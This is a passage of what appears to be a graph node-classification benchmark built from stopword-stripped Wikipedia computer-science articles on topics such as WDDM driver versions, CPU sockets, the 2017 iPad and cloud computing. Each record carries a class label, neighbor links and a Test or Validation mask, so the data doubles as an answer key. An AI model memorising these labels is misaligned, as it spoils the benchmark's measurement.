1.1 drivers used windows vista without platform update windows 8 includes wddm 1.2 dxgi 1.2 new features first previewed build 2011 conference include performance improvements well support stereoscopic 3d rendering video playback major features include preemptive multitasking gpu finer granularity dma buffer primitive triangle pixel instruction-level reduced memory footprint improved resource sharing faster timeout detection recovery 16-bit color surface formats 565 5551 4444 mandatory windows 8 direct3d 11 video supports yuv 4:4:4/4:2:2/4:2:0/4:1:1 video formats 8 10 16-bit precision well 4 8-bit palettized formats wddm 1.2 supports display-only render-only wddm drivers microsoft basic display driver warp-based microsoft basic render driver replaced kernel-mode vga driver wddm 1.0/1.1 allows rudimentary task scheduling using batch queue granularity improvements multitasking well fast context switching support virtual memory initially expected versions tentatively named wddm 2.0 wddm 2.1 announced winhec 2006 windows 8.1 includes wddm 1.3 dxgi 1.3 new additions include ability trim dxgi adapter memory usage multi-plane overlays overlapping swap chains swap chain scaling select backbuffer subregion swap chain lower-latency swap chain presentation driver feature additions include wireless displays miracast yuv format ranges cross-adapter resources gpu engine enumeration capabilities graphics kernel performance improvements windows 10 includes wddm 2.0 designed dramatically reduce workload kernel-mode driver gpus support virtual memory addressing allow multithreading parallelism user-mode driver result lower cpu utilization windows 10 also includes dxgi 1.4 direct3d 12 api announced build 2014 requires wddm 2.0 new api away automatic resource-management pipeline-management tasks allow developers take full low-level control adapter memory rendering states display driver model windows 8.1 windows phone converged unified model windows 10 new memory model implemented gives gpu per-process virtual address space direct addressing video memory still supported wddmv2 graphics hardware requires considered legacy case ihvs expected develop new hardware supports virtual addressing significant changes made ddi enable new memory model windows 10 anniversary update version 1607 includes wddm 2.1 supports shader model 6.0 mandatory feature levels 12_0 12_1 dxgi 1.5 supports hdr10 10-bit high dynamic range wide gamut format defined itu-t rec 2100/rec.2020 variable refresh rates windows 10 creators update version 1703 includes wddm 2.2 tailored virtual augmented mixed reality stereoscopic rendering windows mixed reality platform dxgi 1.6 windows 10 fall creators update version 1709 includes wddm 2.3 following list new features windows display driver development windows 10 version 1709 windows 10 april 2018 update version 1803 includes wddm 2.4 following updates display driver development windows 10 version 1803 since introduction windows 10 april 2018 update due changes wddm became possible use dual graphics laptops example allows run programs games powerful video card display image via built-in graphics directly internal pci-e external bus without connect monitor powerful video card also act solution problem vga video output video card present motherboard windows 10 october 2018 update version 1809 includes wddm 2.5 updates display driver development windows 10 version 1809 include following windows 10 may 2019 update version 1903 includes wddm 2.6 super-wet ink feature revolves around front-buffer rendering ihv drivers support creation “ displayable ” textures formats modes supported hardware allocating texture app requested along “ shadow ” texture format/layout displayed copying two present-time “ shadow ” may necessarily texture normal way think may compression data additionally may required exist may optimization instead runtime evolve understand aspects displayable surfaces whether shadow must exist display particular vidpnsource/plane whether optimal shadow exist transfer contents application surface shadow surface runtime explicit operation opposed implicit within present request setting mode dynamically flipping original shadow surfaces scanout may begin shortly vblank scans vertically top bottom image completes shortly next vblank always case depending timing pixel clock layout data texture especially actually compression available new ddis added separate understand transformations occur prior scanout order possible enable front-buffer rendering variable rate shading coarse pixel shading mechanism enable allocation rendering performance/power varying rates across rendered images previous model order use msaa multi-sample anti-aliasing reduce geometric aliasing amount reduce geometric aliasing needs known up-front target allocated amount reduce geometric aliasing ’ changed target allocated wddm 2.6 new model extends msaa opposite coarse pixel direction adding new concept coarse shading shading performed frequency coarser pixel group pixels shaded single unit result broadcast samples group coarse shading api allows apps specify number pixels belong shaded group coarse pixel size varied render target allocated different portions screen different draw passes different course shading rates multiple-tier implementation available two user-queryable caps tiers 1 2 coarse shading available single-sampled msaa resources msaa resources shading performed per-coarse-pixel per-sample usual however tiers 1 2 msaa resources coarse sampling used shade frequency per-pixel per-sample tier 1 shading rate specified per-draw-basis nothing granular shading rate applies uniformly drawn independently lies within render target tier 2 shading rate specified per-draw-basis tier 1 also specified combination per-draw-basis semantic per-provoking-vertex screenspace image shading rates three sources combined using set combiners screen space image tile size 16x16 smaller shading rate requested app guaranteed delivered exactly precision temporal reconstruction filters sv_shadingrate ps input supported per-provoking vertex rate also referred per-primitive rate valid one viewport used sv_viewportindex written per-provoking vertex rate also referred per-primitive rate used one viewport supportspervertexshadingratewithmultipleviewports cap marked true additionally case used sv_viewportindex written collect diagnostic info allows os collect private data drivers graphics adapters consist rendering display functions new feature requirement wddm 2.6 new ddi allow os collect information time driver loaded currently os uses dxgkddicollectdebuginfo function implemented miniport query driver private data tdr timeout detection recovery related cases new ddi used collect data variety reasons os call ddi diagnostic needed providing type information requested driver collect private information important investigate issue submit os dxgkddicollectdebuginfo eventually deprecated replaced dxgkddicollectdiagnosticinfo background processing allows user mode drivers express desired threading behavior runtime control/monitor user mode drivers would spin background threads assign threads low priority possible rely nt scheduler ensure threads ’ disrupt critical-path threads generally success apis allow apps adjust amount background processing appropriate workloads perform work driver hot update reduces server downtime much possible os component needs updated driver hot patch used apply security patch kernel mode driver case driver asked save adapter memory adapter stopped driver unloaded new driver loaded adapter started",
    "neighbors": [
      10243,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      3109,
      8740,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      7236,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      8296,
      5225,
      622,
      9839,
      4210,
      2676,
      7796,
      1656,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      651,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      2749,
      8391,
      200,
      9420,
      5840,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      5386,
      6927,
      3856,
      9491,
      11539,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      10024,
      3881,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      1348,
      4423,
      844,
      3922,
      4439,
      5465,
      7519,
      10079,
      11616,
      2402,
      4458,
      6506,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      2493,
      2495,
      960,
      7106,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4179,
    "label": 3,
    "text": "Socket_6:socket 6 socket 6 486-generation cpu socket slightly modified version common socket 3 used motherboards intel designed new standard near end 80486 market life motherboards produced used especially socket 3 standard already sufficient",
    "neighbors": [
      5901,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 4180,
    "label": 2,
    "text": "IPad_(2017):ipad 2017 ipad officially fifth-generation ipad 9.7-inch tablet computer designed developed marketed apple inc. announcement march 21 2017 conflicting naming conventions spawned number different names including seventh-generation ipad ipad 2017 retains screen size ipad air line tablets powerful ipad air 2 even overall dimensions weight similar original ipad air unlike ipad air 2 generation ipad fully laminated display lacks anti-reflective coating unlike ipad pro smart connector features dual-speaker system ipad received mixed reviews significantly praised performance reviewers asserting model noticeably faster older ipad models also received positive reviews price battery life criticized however lacking laminated anti-reflective screen lack support apple pencil attachable keyboards smart connector introductory price united states lowest ever ipad media noting lower price might effort encourage wider adoption tablet education sector well businesses needing inexpensive tablets undemanding uses march 27 2018 apple announced successor 2018 ipad also marked discontinuation ipad ipad announced apple march 21 2017 press release confusion around naming referred ipad marketing called fifth-generation ipad official statements specifications sheets title previously taken 2013 ipad air sources refer seventh-generation ipad including ipad air ipad air 2 fifth- sixth-generation ipads respectively also referred ipad 2017 matt kapko cio wrote apple introductory pricing 329 united states ipad 70 price reduction versus ipad air 2 appeared designed fend encroachment google chromebook laptops education sector foster wider adoption customer-facing terminals kapko also wrote device designed appeal businesses require inexpensive tablets undemanding use including kiosks checkout terminals hospitality screens time original release ipad shipped ios 10 version apple mobile operating system new units sold come new ios 11 operating system instead included touch id fingerprint sensor allows user unlock device well approve purchases app store itunes store ibooks store touch id apple pay let user purchase items websites within apps ipad 9.7-inch 25cm screen compared ipad air 2 processor updated apple a8x a9 embedded apple m9 motion co-processor ipad 2 gigabytes ram 7.5mm thick thickness ipad air compared 6.1mm ipad air 2 unlike ipad models available ipad display fully laminated anti-reflective coating however ipad brighter screen ipad air 2 25 brighter according apple available 32 128 gigabyte storage options contrasting ipad pro lineup ipad features two speakers opposed four smart connector support flash back offered silver gold space grey colors despite use apple a9 processor accompanying m9 motion co-processor introduced iphone 6s 2015 ipad feature support always-on hey siri voice input feature advertised made possible low-power processing then-new chips use hey siri limited ipad connected power product teardown ifixit showed design ipad nearly identical ipad air except differences addition touch id lack physical mute switch microphone holes smaller single row speaker holes dieter bohn verge wrote thin fast tablet praised screen good despite fancy true tone display ipad pro things made screen ipad air 2 nice lamination anti-reflectivity criticized lack support attachable keyboards apple pencil praising a9 processor significantly faster older ipads though noting n't necessarily significantly faster ipad air 2 fast ipad pro also disliked ipad features two speakers opposed four ipad pro summarizing overall review fundamentally trying tell ipad trust ipads decent tablets basic level quality speed functionality get one need one n't stress 're missing n't sascha segan pc magazine wrote apple ipad affordable ever noted little reason existing ipad owners upgrade new ipad price stabs stake heart many competing android tablets although criticizing non-laminated display little washed predecessor claimed could n't see measurable difference nominal degradation quality n't really matter everyday use segan also praised performance compared prior ipad models also praised improved wi-fi performance writing quite impressive double wi-fi speeds new ipad air 2 jeff benjamin 9to5mac wrote sure lacks gorgeous laminated anti-reflective display ipad air 2 sure ’ svelte either thickness weight ’ denying 2017 ipad a9 dual core processor tow good value described tablet solid buy upgraders new users igor bonifacic mobilesyrup also praised performance well number ipad apps available criticized camera outdated keyboard/pencil incompatibility summarization reading 2017 ipad exciting tablet ’ supposed exciting ... apple ’ latest tablet iterative update designed appeal specific subset consumers bonifacic also called tablet perfect first-time tablet buyers chris velazco engadget praised battery life describing one best ipads 've tested also criticized lack anti-reflection display calling another cost-saving measure wish apple reconsidered",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      9970,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4181,
    "label": 3,
    "text": "Xak_II:_Rising_of_the_Redmoon:xak ii rising redmoon xak ii rising redmoon fantasy role-playing video game developed published japanese software developer microcabin direct sequel xak game released japan due msx scene arose europe predominately netherlands region msx versions xak received fan translations enhanced remake later released nec pc-engine together first game series xak ii telenet japan development team riot xak ii direct sequel first game series features high fantasy setting xak gods division world xak world men oceanity world faeries xexis world demons referenced xak depicted game introduction adventure main hero xak series latok kart exploring vast region situated around single central village banuwa xak protagonist latok kart fought defeated demon zemu badu one badu minions escaped black-robed man known necromancer three years later necromancer able contact one allies demon world xexis fearsome demon called zamu gospel following prophecy foretold ancient extremely powerful sorcerer name amadok necromancer three demons referred demonlords attempting complete dark ritual revive zamu gospel world xak player controls latok nineteen years age rumour whereabouts latok father dork surfaced around village banuwa latok faerie companion pixie travel village investigate soon run gospel minions latok playable character game faerie pixie accompanies throughout game comments latok actions controllable player however notable non-player characters latok pixie meet include xak ii follows structure predecessor game proceeds player finding way labyrinthine maps defeating opposing monsters way map puzzles solved keys npcs objects found gain entrance room boss dwells defeating boss player proceed towards next map structure repeats various sub-quests involving npcs present obligatory combat real-time player character walks around game maps well monster characters character attack defense rating player latok swing sword pressing action key monster character near enough sustain damage monsters damage latok touching hitting projectiles combat system requires manual dexterity especially boss fights—bosses generally several times larger latok msx2 xak ii displayed screen 256x212 display resolution game uses scrolling display map scrolls away player character reaches distance screen side 1/3 total display due larger amount memory available 256x212 display compared 512x212 one game scrolling markedly smoother xak game music supports internal psg sound system well optional msx-music style heard microcabin productions msx psg channels used main melody sound effects msx-music channels used supporting instruments prominence psg less marked first game",
    "neighbors": [
      10339,
      10534,
      145,
      10931,
      6011
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4182,
    "label": 2,
    "text": "Allegro_(software):allegro software allegro software library video game development functionality library includes support basic 2d graphics image manipulation text output audio output midi music input timers well additional routines fixed-point floating-point matrix arithmetic unicode strings file system access file manipulation data files 3d graphics library written c programming language designed used c c++ objective-c bindings available python lua scheme go languages allegro comes extensive documentation many examples allegro supports windows macos unix-like systems android ios abstracting application programming interfaces apis one portable interface previous versions 4.4 supported windows macos dos beos various unix-like systems without x window system also independent port allegro amigaos 4 morphos released terms zlib license allegro free open source software initially standing atari low-level game routines allegro originally created atari st early 1990s however hargreaves abandoned atari version realized platform dying reimplemented work borland c++ djgpp compilers 1995 support borland c++ dropped version 2.0 djgpp supported compiler djgpp dos compiler games used allegro therefore used dos around 1998 allegro branched several versions port windows winallegro created also time unix port allegro xwinallegro created various ports brought together allegro 3.9 wip versions allegro 4.0 first stable version allegro support multiple platforms current development focused allegro 5 branch complete redesign api much library internal operation effort made make api consistent multi-thread safe default library hardware accelerated using opengl directx rendering backends appropriate many addons existed separate projects allegro 4 interface seamlessly allegro proper bundled default installation allegro 5 event driven allegro provides following graphic functions community allegro users contributed several library extensions handle things like scrolling tile maps import export various file formats e.g png gif jpeg images mpeg video ogg mp3 s3m xm music ttf fonts allegro 4.x used conjunction opengl using library allegrogl extends allegro functionality opengl therefore hardware allegro 5 natively supports opengl",
    "neighbors": [
      8454,
      2826,
      3210,
      6797,
      5397,
      3734,
      5914,
      1435,
      4777,
      11306,
      5165,
      7983,
      11700,
      2368,
      2769,
      9434,
      5083,
      9691,
      10083,
      10470,
      8554,
      10480,
      6900,
      2293,
      1916,
      2045,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 4183,
    "label": 1,
    "text": "Database_testing:database testing database testing usually consists layered process including user interface ui layer business layer data access layer database ui layer deals interface design database business layer includes databases supporting business strategies databases collection interconnected files server storing information may deal type data i.e databases may heterogeneous result many kinds implementation integration errors may occur large database systems negatively affect system performance reliability consistency security thus important test order obtain database system satisfies acid properties atomicity consistency isolation durability database management system one critical layers data access layer deals databases directly communication process database testing mainly takes place layer involves testing strategies quality control quality assurance product databases testing different layers frequently used maintain consistency database systems commonly seen following examples figure indicates areas testing involved different database testing methods black-box testing white-box testing black-box testing involves testing interfaces integration database includes help techniques functionality database tested thoroughly pros cons black box testing include test case generation black box testing fairly simple generation completely independent software development done early stage development consequence programmer better knowledge design database application uses less time debugging cost development black box test cases lower development white box test cases major drawback black box testing unknown much program tested also certain errors detected white-box testing mainly deals internal structure database specification details hidden user main advantage white box testing database testing coding error detected internal bugs database eliminated limitation white box testing sql statements covered generating test cases database testing semantics sql statement need reflected test cases purpose technique called white box database application technique whodate used shown figure sql statements independently converted gpl statements followed traditional white box testing generate test cases include sql semantics set fixture describes initial state database entering testing setting fixtures database behavior tested defined test cases depending outcome test cases either modified kept tear stage either results terminating testing continuing test cases successful database testing following workflow executed single test commonly executed",
    "neighbors": [
      10048,
      9569,
      7080,
      1801,
      2413,
      10413,
      11571,
      2901,
      11030,
      3768,
      3004
    ],
    "mask": "Test"
  },
  {
    "node_id": 4184,
    "label": 2,
    "text": "Directory_Utility:directory utility directory utility utility included macos previously mac os x operating system configure connections directory services os x 10.6 10.9 directory utility /system/library/coreservices/ accessed gui via accounts system preferences panel clicking 'join next network account server clicking 'open directory utility os x 10.10 directory utility moved /system/library/coreservices/applications prior mac os x 10.5 tool named directory access",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      168,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 4185,
    "label": 3,
    "text": "Socket_8:socket 8 socket 8 cpu socket used exclusively intel pentium pro pentium ii overdrive computer processors intel discontinued socket 8 favor slot 1 introduction pentium ii slot 2 release pentium ii xeon 1999 socket 8 unique rectangular socket 387 pins supports fsb speeds ranging 60 66 mhz voltage 3.1 3.3v support pentium pro pentium ii overdrive cpus socket 8 also unique pin arrangement pattern one part socket pins pga grid part uses spga grid",
    "neighbors": [
      3588,
      5901,
      5523,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7744,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      9945,
      7002,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      1776,
      10225,
      371,
      3317,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 4186,
    "label": 9,
    "text": "List_of_applications_using_Lua:list applications using lua lua programming language lightweight multi-paradigm language designed primarily embedded systems clients list applications use lua purpose extensibility video game development lua widely used scripting language game programmers perhaps due perceived easiness embed fast execution short learning curve 2003 poll conducted gamedev.net showed lua popular scripting language game programming 12 january 2012 lua announced winner front line award 2011 magazine game developer category programming tools among websites popular website using lua pornhub according wappalyzer applications using lua include",
    "neighbors": [
      5764,
      9353,
      9354,
      4111,
      9616,
      3486,
      10271,
      6436,
      3237,
      4777,
      5291,
      2098,
      2739,
      6834,
      7347,
      9780,
      10565,
      966,
      842,
      338,
      10964,
      7515,
      2652,
      865,
      5096,
      1257,
      5612,
      2810
    ],
    "mask": "None"
  },
  {
    "node_id": 4187,
    "label": 1,
    "text": "Data_hub:data hub data hub collection data multiple sources organized distribution sharing often subsetting sharing generally data distribution form hub spoke architecture data hub differs data warehouse generally unintegrated often different grains differs operational data store data hub need limited operational data data hub differs data lake homogenizing data possibly serving data multiple desired formats rather simply storing one place adding value data de-duplication quality security standardized set query services data lake tends store data one place availability allow/require consumer process add value data data hubs ideally go-to place data within enterprise many point-to-point connections callers data suppliers need made data hub organization negotiate deliverables schedules various data enclave teams rather organizational free-for-all different teams try get new services features many teams includes integration project management systems account management systems..",
    "neighbors": [
      2548
    ],
    "mask": "None"
  },
  {
    "node_id": 4188,
    "label": 3,
    "text": "Movidius:movidius movidius company based san mateo california designs specialised low-power processor chips computer vision company acquired intel september 2016 movidius co-founded dublin 2005 sean mitchell david moloney 2006 2016 raised nearly 90 million capital funding may 2013 company appointed remi el-ouazzane ceo january 2016 company announced partnership google movidius active google project tango project movidius announced planned acquisition intel september 2016 company myriad 2 chip always-on manycore vision processing unit function power-constrained devices fathom usb stick containing myriad 2 processor allowing vision accelerator added devices using arm processors including pcs drones robots iot devices video surveillance tasks identifying people objects run 80 150 gflops little 1w power intel myriad x vpu vision processing unit third generation advanced vpu movidius intel company intel myriad x vpu first class feature neural compute engine—a dedicated hardware accelerator deep neural network deep-learning inferences neural compute engine conjunction 16 shave cores ultra-high throughput intelligent memory fabric makes myriad x strong option on-device deep neural networks computer vision applications intel myriad x vpu received additional upgrades imaging vision engines including additional programmable shave cores upgraded expanded vision accelerators new native 4k image processor pipeline support 8 hd sensors connecting directly vpu myriad 2 myriad x vpu programmable via myriad development kit mdk includes necessary development tools frameworks apis implement custom vision imaging deep neural network workloads chip intel movidius neural compute stick ncs tiny fanless deep-learning device used learn ai programming edge ncs powered low-power high-performance intel movidius vision processing unit found millions smart security cameras gesture-controlled drones industrial machine vision equipment supported frameworks tensorflow caffe 14 november 2018 company announced latest version ncs marketed neural compute stick 2 ai devcon event beijing google clips camera uses myriad 2 vpu",
    "neighbors": [
      3585,
      6818,
      9964,
      3117,
      6415,
      7699
    ],
    "mask": "Test"
  },
  {
    "node_id": 4189,
    "label": 8,
    "text": "Netscape_Application_Server:netscape application server netscape application server integrated software platform developing running transaction-oriented business applications web developed originally kiva software netscape acquired 1997 netscape sun microsystems formed sun-netscape alliance 1999 netscape application server chosen basis iplanet application server offering netdynamics application server acquired sun 1998",
    "neighbors": [
      9665,
      8994,
      10722,
      4166,
      6791,
      488,
      494,
      4728,
      7455
    ],
    "mask": "Test"
  },
  {
    "node_id": 4190,
    "label": 7,
    "text": "Elements_CRM_iOS:elements crm ios elements crm ios mac customer relationship management mac crm solution built ntractive apple business using apple devices offered cloud computing subscription-based service elements crm ios universal mobile app iphone ipad elements crm ios add-on elements crm desktop app ipad crm version elements crm ios looks works feels like desktop app iphone crm app limited version important functions desktop app architecture overall development elements crm product line begun 2003 company founder justin bartak first product elements sbm launched october 2007 july 2009 product name changed elements crm ntractive privately held software development company based grand forks north dakota markets business software small medium-sized companies established 2006 company sole product elements crm customer relationship management application aimed small businesses use mac os x computers ipads iphones elements crm cloud based app employs unique site-specific browser merge os x desktop web application functionality product first introduced public keynote address apple 2007 world wide developer conference official launch elements sbm product ’ original name 1.0 took place macworld/iworld 2009 product renamed elements crm 2.0 release awarded honor apple staff pick july 2009 mac customer relationship management mac crm approach managing company ’ interaction current future customers apple inc desktop computers ios devices mac crm solutions web-based applications use web browser interaction instead mac crm combination cloud based app built apple programming language objective-c swift programming language mac crms involve using apple devices technology organize automate synchronize sales marketing customer service technical support",
    "neighbors": [
      4194,
      9732,
      2950,
      10470,
      6539,
      1300,
      7292,
      6046
    ],
    "mask": "None"
  },
  {
    "node_id": 4191,
    "label": 3,
    "text": "Digital_Packet_Video_Link:digital packet video link digital packet video link dpvl video standard released vesa 2004 unlike previous technologies order save bandwidth portions screen modified sent means link dpvl also introduces metadata video attributes support dpvl standard aimed mobile wireless hardware",
    "neighbors": [
      9056,
      11631
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4192,
    "label": 2,
    "text": "Gobuntu:gobuntu gobuntu short-lived official derivative ubuntu operating system conceived provide distribution consisting entirely free software ubuntu incorporates free software installer option gobuntu project rendered redundant early 2008 result canonical made decision officially end gobuntu project version 8.04 march 2009 announced gobuntu 8.04.1 final release gobuntu project merged back mainline ubuntu need separate distribution mark shuttleworth first mentioned idea creating ubuntu derivative named gnubuntu consisting entirely free software 24 november 2005 due richard stallman disapproval name project later renamed ubuntu-libre stallman previously endorsed distribution based ubuntu called gnewsense criticized ubuntu using proprietary non-free software successive distributions notably ubuntu 7.04 introducing ubuntu 7.10 mark shuttleworth said would gobuntu officially announced mark shuttleworth 10 july 2007 daily builds gobuntu 7.10 began publicly released initial version gobuntu 7.10 released 18 october 2007 text-only installer next release long-term release codenamed hardy heron also made available alternate installation image release 7.10 initially met criticism free software advocates included mozilla firefox firefox considered 100 free software includes mozilla foundation copyrighted icons mozilla licence icons states ... may reproduced without permission debate developer list problem quickly addressed canonical applications non-free logos replaced follow-up gobuntu release hardy heron firefox replaced epiphany free logos drivers firmware binary blobs removed gobuntu would run fewer computers ubuntu canonical stated time release 7.10 13 june 2008 ubuntu community manager jono bacon announced gobuntu project would end release gobuntu 8.04 shuttleworth explained project ended release version 8.04.1 gobuntu versions intended released twice year coinciding ubuntu releases gobuntu uses version numbers code names ubuntu using year month release version number first gobuntu release example 7.10 indicating october 2007 gobuntu releases also given code names using adjective animal first letter e.g gutsy gibbon respective ubuntu code names commonly gobuntu releases referred developers users adjective portion code name example gutsy gibbon often called gutsy",
    "neighbors": [
      546,
      9253,
      11305,
      56,
      59,
      4673,
      3654,
      1101,
      1107,
      1110,
      10851,
      3685,
      9320,
      9324,
      10860,
      2671,
      3189,
      5755,
      11388,
      8837,
      10394,
      673,
      3745,
      3245,
      7854,
      2738,
      4790,
      8907,
      8909,
      10971,
      5343,
      4841,
      6890,
      7913,
      5356,
      7920,
      5363,
      9971,
      9461,
      6393,
      5369,
      8957,
      5380,
      7435,
      2321,
      5397,
      4887,
      8476,
      5410,
      10530,
      6445,
      7983,
      2864,
      7483,
      3903,
      2375,
      5962,
      4951,
      2914,
      5990,
      9064,
      7020,
      7534,
      2930,
      9074,
      1396,
      3969,
      10127,
      11669,
      3478,
      926,
      10149,
      8112,
      439,
      10687,
      4039,
      5067,
      975,
      8147,
      9693,
      3550,
      6625,
      7140,
      485,
      8177,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 4193,
    "label": 7,
    "text": "Cooperative_storage_cloud:cooperative storage cloud cooperative storage cloud decentralized model networked online storage data stored multiple computers nodes hosted participants cooperating cloud cooperative scheme viable total storage contributed aggregate must least equal amount storage needed end users however nodes may contribute less storage may contribute may reward models compensate nodes contributing unlike traditional storage cloud cooperative directly employ dedicated servers actual storage data thereby eliminating need significant dedicated hardware investment node cooperative runs specialized software communicates centralized control orchestration server thereby allowing node consume contribute storage space cloud centralized control orchestration server requires several orders magnitude less resources storage computing power bandwidth operate relative overall capacity cooperative files hosted cloud fragmented encrypted leaving local machine distributed randomly using load balancing geo-distribution algorithm nodes cooperative users add additional layer security reduce storage space compressing encrypting files copied cloud order maintain data integrity high availability across relatively unreliable set computers wide area network like internet source node add level redundancy data block allows system recreate entire block even nodes temporarily unavailable due loss network connectivity machine powered hardware failure storage bandwidth efficient forms redundancy use erasure coding techniques like reed-solomon simple less cpu intensive expensive form redundancy duplicate copies due bandwidth hardware constraints nodes may able contribute much space consume cloud hand nodes large storage space limited bandwidth constraints may contribute consume thereby cooperative stay balance university california oceanstore project mit chord non-commercial example june 1 2016 minebox gmbh announced forthcoming minebox networked attached storage device nas utilize sia network persist backups users minebox also able rent free disk space via sia partly centralized system operated symform inc. startup company based seattle symform generated kept keys used encrypt decrypt since also decided server host parts file users trust symform share party misuse information symform discontinued service july 31 2016",
    "neighbors": [
      8640,
      4194,
      1801,
      3629,
      1908,
      728,
      2395,
      5373,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4194,
    "label": 7,
    "text": "Cloud_computing:cloud computing cloud computing on-demand availability computer system resources especially data storage computing power without direct active management user term generally used describe data centers available many users internet large clouds predominant today often functions distributed multiple locations central servers connection user relatively close may designated edge server clouds may limited single organization enterprise clouds available many organizations public cloud cloud computing relies sharing resources achieve coherence economies scale advocates public hybrid clouds note cloud computing allows companies avoid minimize up-front infrastructure costs proponents also claim cloud computing allows enterprises get applications running faster improved manageability less maintenance enables teams rapidly adjust resources meet fluctuating unpredictable demand cloud providers typically use pay-as-you-go model lead unexpected operating expenses administrators familiarized cloud-pricing models availability high-capacity networks low-cost computers storage devices well widespread adoption hardware virtualization service-oriented architecture autonomic utility computing led growth cloud computing 2019 linux used type operating systems used including microsoft offerings thus described dominant cloud computing popularized amazon.com releasing elastic compute cloud product 2006 references phrase cloud computing appeared early 1996 first known mention compaq internal document cloud symbol used represent networks computing equipment original arpanet early 1977 csnet 1981—both predecessors internet word cloud used metaphor internet standardized cloud-like shape used denote network telephony schematics simplification implication specifics end points network connected relevant purposes understanding diagram term cloud used refer platforms distributed computing early 1993 apple spin-off general magic used describing paired telescript personalink technologies wired april 1994 feature bill andy excellent adventure ii andy hertzfeld commented telescript general magic distributed programming language 1960s initial concepts time-sharing became popularized via rje remote job entry terminology mostly associated large vendors ibm dec. full-time-sharing solutions available early 1970s platforms multics ge hardware cambridge ctss earliest unix ports dec hardware yet data center model users submitted jobs operators run ibm mainframes overwhelmingly predominant 1990s telecommunications companies previously offered primarily dedicated point-to-point data circuits began offering virtual private network vpn services comparable quality service lower cost switching traffic saw fit balance server use could use overall network 